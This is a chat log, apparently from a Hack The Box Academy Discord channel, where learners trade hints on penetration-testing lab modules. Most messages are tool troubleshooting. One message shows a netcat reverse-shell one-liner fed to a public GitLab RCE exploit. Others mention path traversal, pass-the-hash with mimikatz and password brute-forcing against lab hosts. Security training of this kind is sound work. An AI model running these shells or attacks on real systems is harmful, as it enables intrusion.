#modules
new collectors don't work with old bh gui, but old collectors will work with CE
I think those are just official ones, but it's supposed to work with old collectors
yeah that works with CE, just throw it in
hey guys. does anyone know why I am having this behaviour with curl but when checking in the source there is clearly more html to be shown. is this something you have encountered?
google said thats pure css tree i dont think curl can interpret that
i see. thank you box for using google for me :P. But in the module we are using curl to filter out these parts. maybe i need to think another way to do that. thank you loads @muted kindle
Yeah idk about the CE edition, I much prefer the old GUI
hi everyone
I have two problems
1 - the pentester/information-gathering/archivesweb/ room. For the question "How many Pen Testing Labs did HackTheBox have on the 8th August 2018? Answer with an integer, eg 1234." when I use Wayback machine on that date, I come across the page of a domain name seller.
2- the same room for the skill assessment "What is the API key in the hidden admin directory that you have discovered on the target system?"
I can't use any tool on the inlanefreight.htb
thanks to you
There is a file named revilkaseya.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to the REvil ransomware Kaseya supply chain attack. Enter the total number of bytes that the victim has transmitted to the IP address 178.23.155.240 as your answer.
i put 3469 as answer but it says that's incorrect answer,
can someone give me a hint ?
Hi, I'm looking for more context of Introduction to Digital Forensics --> Skills Assessment
"Using VAD analysis" means "Windows.System.VAD" and which suspicious process meaning
Would I be right in saying that krbtgt doesn't always have a SPN assigned otherwise it would be an easy kerberoast and golden ticket attack?
The wording of a paragraph is throwing me off slightly as it says "there is one account with a SPN in the target domain" but the command output shows both krbtgt and mssqlsvc.
Hey Everyone, working through the Information Gathering-Web Edition module and am trying to complete the Creepy Crawlies section. I installed scrapy on the pwnbox and downloaded ReconSpider.py, but when I go to execute ReconSpider.py I get a ModuleNotFoundError: No module named 'scrapy.downloadermiddlewares.offsite'. How do I move forward since the error is in the ReconSpider.py?
Right, I just found a PyPi for ReconSpider, am I supposed to use that?
No
That pypi is likely a different ReconSpider tool that uses a bunch of API keys
Gotcha, so then I guess I should be using what they posted in the module?
Okay, thank you
And the tool author fixed it but ig it hasn't hit the backend
There's a reason it points to the academy backend for download instead of a pip install
Quick question about the Pass the Ticket from Windows lesson in the Password Attack module if anyone know, is there a reason we can PowerShell into the Domain Controller with only having john's Kerberos ticket? is it because John has permission or admin access to remote in to it?
Yes
That makes sense
I have some question related to htb subscription where can I ask
Support
Need to speak to a person? Learn how to reach our support via HTB Labs.
thanks
--path-as-is https://<IP>/../../../../../../whoops
what do these escape sequences mean?
Path traversal
When you cd ../ you go back a directory
So chaining them you can go back to root
it seems v1.2 is now in the course material
how do you know you have to move up to six directories?
That's just the standard traversal amount people use
Could you use less? Probably. But doing more than what's necessary ensures you're in the filesystem root
Say you're in your home dir, you can use cd ../../ to get to root fs, but you can use more and still get there
because you are not sure which directory you're moving from?
Got it, thank you for explaining.
Generally you look for a known file on the system to verify (/etc/passwd)
oh okay, in this case, its writing something to a text file called whoops, isnt it?
in this section: https://academy.hackthebox.com/module/19/section/102
it says Since UDP is a stateless protocol and does not require a three-way handshake like TCP. We do not receive any acknowledgment. This seems like a typo, where there should be a comma in the middle. Is it correct as is?
Hey how do I chat in general?
no clue
I need help
How i chat in general
Read and follow #welcome
same
what's the channel for?
can anyone help?
Guys can someone raid or hack a server
Captured vs displayed
No #rules
what?
I thought this was the server to raid people bro
It's not
I mean raid servers
Nope
If you read #welcome it tells you what the server is about
Look at your screenshot, it tells you how many bytes were captured and how many are displayed
👁️🗨️
i know, and the question asks for the bytes that were captured right?
displayed*
no, it just asks for how many was sent
i tried to sum all displayed packets' length and still incorrect answer
I'd say re-read the section as you likely glossed over something that would make this easy for you
can someone try to RDP into a machine on Password Attacks>Pass the Ticket (PtT) from Windows? or point me in the right direction to resolve these errors?
wrap the password in single quotes
i need help in the new skills check for the INFORMATION GATHERING - WEB EDITION skills assessment for the question "What is the API key in the hidden admin directory that you have discovered on the target system?". but i dont think i have discovered a hidden admin directory. am i missing something, someone pls help.
Look again in the module and then apply all the techniques shown. I'm sure you'll find what you're looking for
okay, thx
🤖
I'm working through the Fingerprinting section of the Information Gathering-Web Edition. I've run out of ideas for determining the CMS system of app.inlanefreight.local. I went through curl initially, but I don't see any options that will pull more information, so I shifted to using nikto. For some reason nikto isn't connecting to app.inlanefreight.local and I get an error saying "open stream: getaddrinfo problems (Name or service not known)". The command I used is nikto -vhost http://app.inlanefreight.local -host <IP> -Tuning b -Display DV. Any ideas what I'm missing?
is it in your /etc/hosts file?
It is not
ip app.inlanefreight.local dev.inlanefreight.local in your /etc/hosts
then that's why it can't resolve
I can try that
it's not hosted publicly; it's on the 10.129.x.x HTB network
meaning external routers/DNS can't reach it
also .local isn't a publicly routed TLD as far as I know
Hi, can someone go to waybackmachine and verify that this questions can be answered?: https://web.archive.org/web/20170501000000*/https://www.hackthebox.com/
For me, it shows like the above. I asked the support at the academy, they tested it but didn't point me in the right direction.
i didn't use nikto for this tbh i used whatweb
Right, but I'm using the pwnbox?
.eu instead of .com
doesn't matter
you still need to tell your pwnbox where it's redirecting to
I answered these this morning
Okay, thank you
I see, thanks. Got it answered now!
Curious, then how did curl work for the other two questions?
i take it you did curl http://ip -H "HOST: app.inlanefreight.local" ?
That's correct
well it's because you're telling curl that the vhost you're using is app.inlanefreight.local querying that ip
but if you tried to visit it (without adding to your hosts file) in your browser, it won't load
I did that with nikto passing in -vhost and then the IP as -host?
Further Credential Theft in windows privesc, does it require any vhost setup in /etc/hosts file. as it contains inlanefreight.local
idk how nikto works tbh
Okay, just curious
generally when you're given vhosts, you should add them to your /etc/hosts
as the guide itself is assuming this position that you've added it to your /etc/hosts
Noted😬
for some reason *.inlanefreight.local is not working
you can't use wildcards in /etc/hosts
hi, mb somebody had this problem or know how fix that? *deleted
i also try to do sudo useradd -M -s /sbin/nologin 10.129.95.230$
sudo smbpasswd -a -m 10.129.95.230, but its not working
bruh idek what you're overcomplicating here
like all those commands you just referenced is hard overcomplicating this shit
also you don't need sudo to use smbclient
it helps if you tell us the module and section you're doing
it looks like there's some weird conflict with the smb server you have running
and not the target
password attacks, network services
I did the same on the pwn box but got the same errors
well
maybe john doesn't have SMB access
all the users for this section are unique
also those screenshots contain spoilers for john's login, i suggest deleting
it doesn't show he has read access to that share bud
again ALL USERS for this section are unique
you will not reuse any users for other questions of this section
WinRM user is different from ssh user is different from SMB user
ok, thx
look at the share name for your hint as to what user you might want to sniff for
I’m doing the “Cracking into HTB” path on the third module, part 8 anytime I’m using gobuster, its giving me this error with the provided host “unable to validate base domain: http://94.237.53.113:36235/ (lookup http://94.237.53.113:36235/: no such host)”
Gobuster dns -d http://94.237.53.113:36235/ -w name list.txt is the command I’m using
You need to add a --domain flag or have the site in your /etc/hosts and call it with http://site:port/
Hi, I'm doing the INFORMATION GATHERING - WEB EDITION module and I'm in the Virtual Hosts section and I'm stuck, I'm doing the following command
gobuster vhost -u http://94.237.59.199:34810/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain and it doesn't work I don't know what to do I need to replace the List words? or add use another flag
You need a domain to append
Alright thank you will try that out
ha
--append-domain would append the domain from the http://ip:port
--domain is a way around it
--domain inlanefreight.htb
ty
Also I have 0 idea what module this actually is
It’s a beginner one
I can’t find it lol anytime I go to the path it won’t give me an overview of them all
Oh it's the getting started module
And in the “in-progress modules” tab it doesn’t show up there
Ah that’s it? Thought that was different my b
Click the "enroll button" next to the cracking into htb skill path
It is indeed in my in progress tab
And it'll populate the list in your dashboard
I don't recall needing to use gobuster dns for this module
Hmm, it seems like that’s what I have to use since everything else doesn’t give me the flag but then I run into that issue
What section?
8 web enumeration
You're gonna feel so dumb
I bet
Use dir first
Lmao
With the common.txt
Yeah I was having trouble finding the path for common.txt
But I just found it
Not the same as in the example
Yeah example is using the old pwnbox version
Ahhhh makes sense
find / -name "common.txt" 2> /dev/null
tried the obvious
Hopefully it's smooth from here
I also suggest using your own vm
Makes everything a lot smoother and more controlled
nvm
Haha yeah thank you just wanted to do the beginner to get acquainted with HTB, and yeah I figured it out now
I would but I’m doing this all at work lmao
Lol yeah
I lied I assumed now that I need to go in order but any of the domains I use can’t be found must be looking in the wrong place
You don't need a domain
You can visit http://ip:port in the browser
And http://ip:port/[found file/directory]
👀
It's why I said to use dir and not dns
Dns isn't required at all for this exercise
Well I cannot recover my email
Skill issue
I figured it out my b, didn’t think it would be that easy was trying too hard lol
But not something anyone here can help with
It's the "getting started" module. It doesn't get simpler than these
It's not actually I forgot change my old number to new number
I set my email as recovery
This how I became dumb
Again no one can help you with that
I am getting crying and crying over if no one help about those password.
I am just child with fragile mind in adult
womp womp
Reach out to the support team that you're locked out of
Worst thing is I cannot remember the password
we are not staff
can anyone advise on the skills assessment for broken authentication? I'm having some trouble with the 2fa
I reached to the staffs
Then be patient
Sounds like dangerous people with password cranking
^^
Nothing can be done for you on the discord brother
Don't ask for help on discord. Rule no.456
especially if you just yapping away in here T-T
Well don't ask for something that literally can only be helped via support channels

Support didn't do anything 😭
Wait for them to see your ticket.
They like " they cannot do reset at their end"
What exactly are you locked out of?
oh well just make a new account 🤷♂️
Your HTB account? Your actual email?
The password and I forgot to change recovery email and phone numbers
imagine its the actual email acc
That doesn't answer the question
my guess he doesnt have access to the email he put on htb so he cant reset it
This sounds like your actual email account
Yeah
How do I solve this lab, who can help ?
Yeah so stop bitching in discord
bro how would htb solve that LMAO
Reach out to your email provider for support
go reach out to google or make a new account LMAO
Are you logging into https://[target_ip]:8834
From there, there are prerun scans for you to analyze
Everything you need to know is in the previous sections
like what
if u confused i suggest re-reading the section LMAO
its pretty simple and straight forward
This is regarding the nessus vuln assessment; all the sections in the nessus subsection teach you how to use nessus
Yes, I'm still a beginner
I did but state ID won't provide because Indian people don't know about that lol
Well you can't learn if you don't read
oh i see and ^
That's too fucking bad
bro what are we supposed to do?? what do u expect 💀
To sum it up @reef stratus no one here can help you
My last option was search password cranking
I strongly recommend stop asking
This is illegal
You don't own your email account, the provider does
a simple solution is make a new account 👍
But I don't know which sections I should start with
re-read it all...
Bro I am actually crying and going through panicked
Well nothing anyone here can do for you
We simply do not care
Fine...
also if something doesn't make sense google and youtube are your friends, nessus is one of the most known tools literally type it into youtube youll understand most of what you need
saying that in a discord is wild 
they keep bugging about wanting someone or help attacking their email that they're locked out of
It's not about attacking
💀
what
Bruh
Password cracking is attacking
Re-read the module up to the nessus assessment
There's the working with nessus scan output section that also may be helpful
and if something doesnt make any sense while you're reading it you can come here for help
But we can't help you if you're too lazy to read the info
^^
If you're doing any of the cert paths it's highly encouraged to take notes
Need help in the Password attack path PTH (pass the hash) section, the question about \DC01\David\david.txt
Just do the thing
Make sure you're adding /run:cmd.exe to launch the new cmd prompt with the user
yeah thats what im doing
with mimikatz, from local Admin on MS01
specifying domain also. Maybe my machine is dead ill try resetting
If a new cmd prompt opens, it works
Can anyone provide advice on the skills assessment for broken authentication? I'm encountering issues with the 2FA implementation. Any tips or guidance would be greatly appreciated.
Iirc you don't need to bruteforce it
Hmm, I'm not sure what else to d
look again in the module. It shows you various techniques
in the Windows Event Logs & Finding Evil module it seems evil to put the mimikatz question last its so much easier than the other 2, I felt like faceplanting my keyboard before that one haha
omg nvm im so stupid i had it from the start..., I was checking who I was logged in locally
im a bit confused in the Web Recon - Skill Assessment section
the website does not seem to have much to play with
i had done this before the update and the questions were different
weird 0_0
hints are in the beginning part of "need to apply a variety of skills learned in this module including:"
I'd recommend redoing the questions, even though you can't change the answer
yeah i have done so so far
Did you identify x.y.inlanefreight.htb?
Also: don't forget to add any found subdomains to /etc/hosts
oh the question said vHosts needed for these questions: inlanefreight.htb so i didnt go much into finding vhosts
That's just to start
If you can't find something: start digging
i tried going with subdomains even though the question seemed to suggest otherwise, didnt think of trying one like x.y.inlanefreight.htb tho thanks
Well you gotta find y before x
Subdomains-top1million-110000.txt is usable for both
maybe i only tried the 20000 before though
Yeah I double triple checked and the subdomain is only on that and the combined list (which is about 60x larger)
great i thought of trying but honestly i was skeptical of enumerating subdomains because of how the question was phrased
and got it indeed
It's the wordlist showcased throughout the module btw
@fathom pendant https://imgur.com/a/pCH8WYP same problem, this is the fourth login data they are unique but the error is the same
Well like I said it looks like whatever you did earlier is fucking with you being able to connect to the target
Take out the -P argument and see if putting in the password that way works
no
do_connect: connection failed NT_STATUS_NOT_FOUND
Well that's a different error at least
try using the impacket smbclient maybe
Wait
The reason for \\\\ is that bash will interpret it as \\
Because \ is the escape character
yeah it was all easy after understanding the correct wordlist indeed
thank you
yeah it is actually pretty useful. maybe i could have struggled a little with the double subdomain because it is something i havent found before doing HTB machines and i dont usually test it, but i guess at some point i would have tried it
i guess next time im stuck it will come to my mind way quicker
All about walking away with new knowledge instead of beating yourself up over it
Doing the live engagement of the shells and payload and trying to get a hostname of host 1, trying to enumerate using nmap but even a -A isn't giving me anything I'm pretty sure there should be an rdp port considering the question, should I just scan directly for rdp?
You need to rdp to the jump host to scan the internal targets from
(Or use host 1 as a jump host)
When running nmap it shuts down my rdp though
Running nmap from the jump host?
Btw jump-host I'm referring to the 10.129.x.x target spawned
Hosts 1-3 are internal to the jump host
On the 172.16.x.x network
Wait so I'm not supposed to be running nmap directly on the host but on the jump host?
Ok so let's break this down
You can only access the jump-host [10.129.x.x] from your machine
The hosts are on the 172.16.x.x subnet [which the 10.129.x.x host has access to]
tracking
You need to either pivot through the jump-host, or use tools on the jump-host to scan and exploit the hosts
The jump-host is a parrot attack-box
Hmmm I'm a little lost there, I understand what you mean however I need to think on the method
I believe a network diagram is provided in the section
Okay I think I'm tracking now
I think one of the biggest things I learned is that you can do protocol://(ip/site) to try and access a site via that protocol over a browser
thanks for the help btw
yeah surprisingly browsers can do a lot of things
my firefox even works as a file explorer
file://path/to/file yeah?
yep
Anyone have a guide to installing crackmapexec on the HTB parrot machine?
Use netexec instead
Crackmapexec is archived and no longer being maintained
cme is obsolete with nxc now
Netexec is the same tool (literally)
Tl;Dr the main people updating and actually maintaining cme did not like the direction the repo owner for cme was going, so they forked it
There is a free installation and lab:
https://www.nameyourpricetraining.com/courses/b6ce7e4c-5748-4272-b776-c400481791f6/take/content
Thanks!
Thanks everyone. Finally make some headway on the password attack module 😓
oh wicked to know that about cme I'll bookmark that for when I need it, thanks.
If you wanna dive fully into the reason, you can read the discussion on the cme github
has anyone completed the windows evasion technique module?
and sorry Hi (losing my decency or what)
it helps if you state what you've tried, what section you're working on so that people aren't just suggesting you to try what you've already done
okay,
Introduction to Windows Evasion Techniques
Page 3
Static Analysis
Static Analysis
got this but no flag appear. wonder if it's normal
well if no flag appears, then you're likely doing something wrong
it's getting deleted because it's large block of text and your account isn't linked ( #welcome )
ok
ok so the cat.log text display it's 'OK' but apparently is not
can't paste it cause too big app
your project configurations need to be exactly the same as the module's
Further Credential Theft in windows privesc, i got the winscp creds. but it is not getting connected. it says tr******.inlanefreight.local does not exist
Password Attacks>Pass the Ticket (PtT) from Linux: having issues understanding what "export KRB5CCNAME" is supposed to be. I have set it to "julio" & tried to get the file as instructed but smb wont connect
okay... that seems corny a bit but okay
Hi, I'm completing Information Security Foundations and have hit a problem with the Windows 10 VM: it does not exist. I downloaded 23+Gigabytes of what I thought was the Windows 10 Developer Evaluation VMware machine, but it does not install, as there is nothing to install after extraction. What have I missed?
you want to install a windows 10 vm? use media creation tool to make an image or get an iso
anyway it feels kinda weird cause when the module start they're disclosing not to do the module anywhere else than their vm but like first real question is litt something you can't do on the provided vm cause it's the target one and not the dev one so you have to do the compiling stuff on your own vm, feels odd
that's not the right environment variable to set
it felt wrong doing it, i'm at a loss
check the example
@next bronze I am following explicit instructions on what and how to install Windows 10. I have an installation of VMware; I have installed ParrotOS on the VM. The task now is to install Windows 10, but the description of the download is that it is a pre-configured VMware machine. This is where I am having a problem. There is no installation media for Windows 10 VMware, or at least, I have been unable to find it among the 23 GB of data I downloaded.
thanks I was getting mixed up in my notes
like I said, you should install the proper way using media creation tool to make an image or get an iso, there are youtube videos on how to do that. if you want to use the premade vm you can just open the ovf with vmware, but that image is bloated as hell
@next bronze Okay; I'll give both a try. Thank you.
If they update a module do you have to redo it again to complete the cpts pathway? One of the modules I completed says I have more to do now?
Thanks for your help. I used the .ovf installer; Windows 10 is up and running.
As far as I know, no. It’s still marked completed. But it probably would not be a bad idea to go over the updated version a few times, as I do not know if those updates are reflected in the CPTS exam.
I'm definitely going to do all of them again. Just weird having my completion level just drop since it definitely went from view to continue
only if you reached 100% path completion prior to the update
Damn noted
Marcie knows for sure. I was just guessing. Don’t listen to me 😂
😂 still appreciate the response
i mean the only people with the actual knowledge is support
so if you really wanna know, bug them
Yeahhhhh I should not have responded tbh
my knowledge comes from the last time something like this happened (The addition of the thick clients to common apps)
i did that b4 so i help u in like 30 min
bro how did i not know about this https://help.obsidian.md/Editing+and+formatting/Callouts
Okay, I'll reach out when I'm ready, need to put our oldest to bed
:)... im 14 years old, could technically be your son 😂
okay ready to help, so basically when i was doing the question i didnt know what a cms was so i asked chatgpt "in the context of this question what is a cms" and it replied by telling me what it was and listing some common ones, then i ran whatweb and searched for a common cms and if u do that you should find your answer
it also helps that it even says "Content Manager" in the tag for it 
i've had wappalyzer be hit or miss with this question tbh
some people get it, some don't
😭
whatweb doesn't fail me 🙏
if you don't believe me go back and look at the whatweb output 
nonono, i used whatweb
yes
I think way back when i did this (yes it's a repeated target from the previous iteration) I just looked for the most common word in the source code
if you also view the page it also says it multiple times
sometimes you can make leaps of logical deduction
"man this is repeated a bunch of times..."
yes
it's just knowing when you can safely make the logical deduction, and when to continue digging
also why did u comment robot i checked robots.txt but it is not there?
there's definitely a robots.txt on one of the subdomains for the hidden dir
but good deduction that i was referring to the robots.txt
Hey its funny but I can't close this chat
support will close the chats on their end
just click the green bubble to minimize the chat view
yes >_<
someone pls help:
Does anyone know why it’s not working for me, and if it’s not a problem on my part who should I contact so I can finish it.
not working (wanna find subdomains)
for the info gathering web edition skills check
idk why its not working anymore
i tried restarting and reseting host
I've had extensive issues with the info gathering web edition skills check as well. Couldn't seem to get it working. I finished it months ago before they updated it, have issues going back to it now.
I just decided to move on for now @rustic sage
Hi everyone,
Can someone help me out? I'm in the AD Module | AD Enumeration & Attacks - Skills Assessment Part I. I'm about to get the last user and password, but the command just isn't working.
thx u (now ik not just me) will ask in help section
You actually don't need to do the labs again. You can bypass the module by simply completing the new pending reading.
Yes, I know that. Still not bad to go through again to refresh and check in on the new content they added. 🙂
They changed many of the questions in the module, so the listed old answers aren't actually correct for the new questions. Wish they would either reset it or give us the option to reset it.
your proxychains is timing out
what do u mean?
how can i bypass
bc having much issues with this
What does this mean
How can I complete the module if not working
Literally just navigate through all the sections of the module until you have no pending sections left to complete. This works only if you already completed the module before the update. This allows you to bypass=complete the module without doing all the labs again
If this is your first time going through the module, you are fine. I finished the module months ago before they updated it. My old answers to the old questions are still there, but there are new questions. It doesn't matter for you, just for people who did it before the update
😆
lmao. i can't ping to the IP lol.
That is why is timing out right?
Thank you, I'll give that a go shortly
Are you pinging from the PwnBox or your own personal? Further, is that host actually up?
U should try ligolo
Proxychains doesn’t support icmp
that's a different subnet, you'll need to pivot
PwnBox. i found that IP this monday and maybe is not the same now.
Do you have any hint on why proxychains is timing out?
Did you write 172.0.0.1 instead of 127.0.0.1 in /etc/proxychains.conf?
Yeah i did
It is up and I have tried both own box and personal
That was it lol
Yes that didn't help ^^
Still timing out. 😦
But i think it does matter, I just started it today and final part not working
Very confused
Ahhh
do you have the port forwarding set up?
I used ligolo-ng and not one of the other methods that involves proxychains so I wouldn't know
you need to have a listener within the network that allows you to forward the request through that socket
@rustic sage @fathom pendant I used whatweb and got it, I'm still curious to get nikto working, but I can wrestle with that later. Thank you both for your help!
Np
Does anyone know why this is not working? And if it’s not a problem on my end who should I contact to get it fixed?
During this module you may want to try ligolo-ng too (like several people said)
For your problem, maybe you need to use socks4 127.0.0.1 9050 instead of socks5 127.0.0.1 1080, not sure what netexec supports
use a different wordlist
Okay, thx will try (if all it was was the wordlist will rage)
Got it, thank you all. Much appreciated!
it also helps to use inlanefreight.htb:port instead of the IP for --enum
Okay
Thx u
what section are you on?
Skills check
then yeah
use the subdomains-top1million list that's been referenced a lot in this module
it will be useful to add -r as well to the dnsenum command
as a note; add all found subdomains to the hosts file on the same line as the inlanefreight.htb entry
you can put multiple entries on the same line
ip entry1 entry2 entry3 ...
Thx ( I already knew but Thx u for help… will run with bigger wordlist now)
After that just enumerate the found subdomains
Ok
not working dont think its problem with wordlist not resolving: inlanefreight.htb:37582 NS record query failed: NXDOMAIN
Don't worry about that part
?
But that’s the last part it doesn’t run the wordlist not fuzzing at all I don’t think
Also not working with ffuf
It’s as if not recognizing what’s in hosts file
Like dns broken or smt
nah
i used ffuf for this
not dnsenum btw
dnsenum really only works if DNS is running btw
bros having a seizure
gobuster also worked for me
Here’s what I will do, will submit vid of me trying to do it in help section so u and others see
idk what to tell you dude
ffuf and gobuster worked for me
what's your ffuf command?
Almost
is he doing the footprint module?
ah gotcha
that's not how you fuzz for hosts
vhost*
ffuf -w <wordlist> -u http://host:port -H "HOST: FUZZ.host" -ac
it's taught how to do this in the module
at least with gobuster
Ah fk ur completely right I totally forgot 💀
loll
Thx u so much
gobuster vhost -u http://host:port -w <wordlist> --append-domain
you can also increase threads
just tested mine with 100 threads and should be safe
-ac autocalibrates and throws away the junk responses btw
shiiiiet 1000 threads works too
gobuster does not like 1000 threads
also your wordlist is wrong
you went smaller not larger btw
the previous list you used was 20000 current 5000
@rustic sage I just spun up a target and ran the commands to enumerate and stuff and it all worked as intended
also to add on- with results.json from the ReconSpider tool; you can do cat results.json | jq -r '.[key]' (replacing [key] with the json key value, leaving the leading .)
the key values are in the creepy crawlies section if you wanna look it up
Thx u, will do… not yet though in 2 days bc bed time rn and tmr have flight
rest well brother have a safe flight
Thx, u too
Can I get a hint on Enumerating API section of Advanced XSS and CSRF Exploitation module.
I'm getting error: "NetworkError: Failed to execute 'send' on 'XMLHttpRequest': Failed to load 'http://api.vulnerablesite.htb/v1/sessions'."
I've tried payload without credentials,
I have tried fetching authentication bearer from localStorage but my payload returns null
I have tried payload that makes use of iframe but no luck as well
this may sound silly but is the api.vulnerablesite.htb in your /etc/hosts?
Hi Guys, I just started the CPTS path and in the Getting Started module, specifically the Privilege Escalation section, I'm trying to transfer the "id_rsa" file to the pwnbox. It seems I'm missing something basic here.
What I've tried: I tried copying the file to the user2 folder, which worked. From there, I tried copying to the pwnbox which didn't work.
Any help will be appreciated. Thanks
just copy/paste
I don't believe it's meant to be, the simulation tries to mimic an internal API that's not reachable directly. So the idea is attacker targets http://vulnerablesite.htb, adds XSS payload, waits for admin victim to click on payload which then tries to get internal API http://api.vulnerablesite.htb
cat the file, select it all, ctrl+shift+v --> open a text editor, ctrl+shift+v in the text editor, save
try and see?
ok will do
@fathom pendant It worked. It's silly of me not to have thought of it. lol. thank you
in a public server DNS would normally route it, however these aren't public internet servers (even if using a public_ip:port, the domains/vhosts aren't publicly routed)
noted. thanks
the only time public servers are involved is when they have you attack inlanefreight.com (these happen on occasion, it is a site owned by HTB for use in pentesting practice, it's registered so you can always access it)
if you hadn't noticed the fictional company inlanefreight LTD keeps popping up in these environments 😉
Actually I have. I did a recent module lab on it
yup; and I can understand initial hesitation to go after a .com site, but it is 100% allowed :)
idk if they changed a lot of it for the info gathering module, but they had you previously do basic recon/tools like whois; dig queries; etc to get basic info about sites that have a public bounty program and the scope is there
I'm yet to start the info gathering module so I can't speak to it
But I'll keep that in mind
imo the update they did clears a LOT of stuff up
and the skills assessment wants you to use practically all the skills and tools from it
i'd say it should take ~ 30 minutes with no hiccups, ~60 minutes if you get hung up on something/start overthinking
Sure. I'm looking forward to it
that didn't work, I think the trick is in bypassing CORS restriction but I have exhausted all tricks I know to bypass e.g. change GET => POST, use <iframe>, remove withCredentials
i haven't done this module truthfully but i wish you luck in getting an answer ¯_(ツ)_/¯
Hi
Module: Attacking Common Applications
Section: Attacking GitLab
Question: gain remote code execution on the GitLab instance? Submit the flag in the directory you land in.
Here, I found the user named Dxxx, could you give me a hint how to find his password? I tried hydra with rockyou.txt but all passwords are false positives.
i dont remember on the top of my head but have u tried to see maybe there is a password somewhere in the gitlab?
if u havent already
i didnt find anything. i do check that
maybe check the version of the gitlab and see if it has any exploits
im getting this error tho : listening on [any] 8443 ...
connect to [10.10.14.114] from (UNKNOWN) [10.129.162.93] 54164
bash: cannot set terminal process group (1281): Inappropriate ioctl for device
bash: no job control in this shell
git@app04:~/gitlab-workhorse$ exit
while getting the rce.
using this exploit: https://www.exploit-db.com/exploits/49951
well it is an authenticated exploit and since u haven't found the correct password for the user, that could explain why it fails
it looks like you're typing exit at the end there...
after you get the user@host...
or that too
it doesn't look like it fails... it looks like it exits
that error is a standard error for a lot of service accounts with bash
ah got it
it just means it doesn't have a profile set ¯_(ツ)_/¯
as most app/services won't have a profile/bashrc
true true
i definitely feel like he just saw the bash errors and typed exit after it loaded...
no i didnt
well something added the exit command at the end
try again and see 🤷♂️
at least from the tidbit you showed
||python3 rce.py -t http://gitlab.inlanefreight.local:8081 -u Dxx -p pxxxx -c 'rm /tmp/f;mkfi^C /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.114 8443 >/tmp/f '|| well this was the command i used. the rce.py script is: https://www.exploit-db.com/exploits/49951
the acc Successfully Authenticated
but it exits automatically
is the ^C part of it?
nah
just to make sure lol u did copy the command shown on the section since its the same exploit
and it just exits once u connect?
that's weird
is cryptography in oscp?
define what you mean by that
cryptography is kinda broad
like rsa key and stuff
it can be used to mean password hashing
potentially
like decryption like in the brainfuck
no
haaaaa yeah damn yes working
there was an encrypted sentence
like decryption for this in brainfuck Mya qutf de buj otv rms dy srd vkdof 🙂
Pieagnm - Jkoijeg nbw zwx mle grwsnn
A admin
Apr '17
Xua zxcbje iai c leer nzgpg ii uy...
O orestis
Apr '17
Ufgoqcbje....
Wejmvse - Fbtkqal zqb rso rnl cwihsf
A admin
Apr '17
Ybgbq wpl gw lto udgnju fcpp, C jybc zfu zrryolqp zfuz xjs rkeqxfrl ojwceec J uovg 🙂
mnvze://zsrivszwm.rfz/8cr5ai10r915218697i1w658enqc0cs8/ozrxnkc/ub_sja
O orestis
Apr '17
Si rbazmvm, Q'yq vtefc gfrkr nn 😉
Qbqquzs - Pnhekxs dpi fca fhf zdmgzt
like what would you call this kind of decryption?
so i can learn
The Active Directory Enumeration & Attacks module has sooo much information. Been working through it and taking notes for three days now 😅
this isn't required for OSCP
reminder: OSCP is an entry cert also this question belongs more in #careers-and-certs not here in the modules channel @sleek moss
Hello
Module Introduction to Python 3
I'm up to Managing Libraries in Python and trying to install flask with pip but when I try it says error: externally-managed-environment and won't let me progress. What am I doing wrong?
add --break-system-packages
python 3.11+ introduced the "EXTERNALLY-MANAGED" File
you can also remove that file as all it is is a simple flag file
you can install flask with pipx
my monthly subscription has expired but still I can use unlimited pwnbox
why?
is there any reason?
because you spent money
yes, that's the legit reason
if you spend any amount of money/have had a subscription you still retain the unlimited pwnbox
Will I get this benefit for lifetime? @fathom pendant
yes
ReconSpider is causing many errors when I try to install, anybody also have/had this problem?
no errors here
you may need to add --break-system-packages if you hadn't deleted the "EXTERNALLY-MANAGED" File in your python install
thanks!
good morning/afternoon to all. I have an issue with the Web Attack module: I cannot recreate what is asked during the explanation of the module. It requires us to use this curl command to grep some parts of the html but this does not work on the live target when I try. curl -s "http://SERVER_IP:PORT/documents.php?uid=3" | grep -oP "/documents.*?.pdf" The HTML code that needs to be grepped does not come up even though it is in the source code when I look manually.
well did you swap out the target:port to the target IP and port?
i.e. 94.234.87.99:36578
anyone DM for advice on the skills assessment for broken authentication? I'm having some trouble with the 2fa, i tried all: brute force, bypasses, session attack ...
You can send me a DM
Hello everyone, I'm having trouble with the "INTRODUCTION TO ACTIVE DIRECTORY" module. I'm supposed to connect to a pwnbox and connect via rdp to a windows machine. I can connect and I accepted the certificate but it cannot load the remote machine, just a black screen until I get disconnected.
Am I doing something wrong or is pwnbox overloaded right now?
press enter when you get the blackscreen
I managed to load after 7th attempt, thanks
is there any way to resize xfreerdp window?
I just cannot see windows start
you need to use /dynamic-resolution in your xfreerdp
you need to first crack it open before being able to parse it
it's explained, you just didn't read
thanks
throw hashcat at it and you'll be surprised
they also show how to grab it via nxc/cme
but it's with secretsdump.py
to extract
In previous projects, I have been tasked with auditing Active Directory passwords as well as compromising an Active Directory Domain…
generally HTB will show the simpler way
but if you wanna go through the effort of doing it this way; be my guest
it took 5 seconds to google and find an answer
short answer; yes it's likely intentional
considering they give you the cme command that makes it easier
if you want them to add it, submit to #1234357888114364508
I know it's scheduled maintenance but it still makes me sad. I was in mid command execution and the VM is down now 
i'm not aware of any sched maintenance
usually it's at the bulletin at the top
the pwnbox do have lifetimes
Ongoing US maintenance rn
min 2 hours from you turning it on
this is why I use my own vm ¯_(ツ)_/¯
don't gotta worry about maintenance unless I fuck up ™️
then don't describe it as a vm, describe it as the target
So on all those machines that get stuck on a black screen with xfreerdp (but not Remmina), apparently pressing Enter once fixes the problem, indeed, thanks 
vm implies it's the machine you're using
yeah, it's failing to draw the corporate AUP screen
just saying; when you say "VM" it implies something different
I and many others will read it as "The VM i am using/pwnbox"
not the target machine
The target machine is in fact a VM
it is, but that doesn't mean people don't have preconceived ideas of what VM means in relation to academy
"VM is down oh no" --> many people assume you mean the pwnbox
Target is down --> ah, skill issue
it's not about being "technically correct" it's about what words people use to describe the environments
also some of the targets are docker containers
just trying to help you for future, that way people don't get confused when trying to help you
can someone give me a little nudge for Skills Assessment - File Upload Attacks
You need to specify which VM (target or attack) you mean. If you don't, then don't ask a question. It's confusing asf
not me trying to go through those messages to find my question, im cooked 
HTTP ATTACKS - TE.CL
Getting a request timeout from the target even though I used the payload shown in the solutions. Anybody able to help with this?
Check your network connection
can anyone help me out with this part really confused here
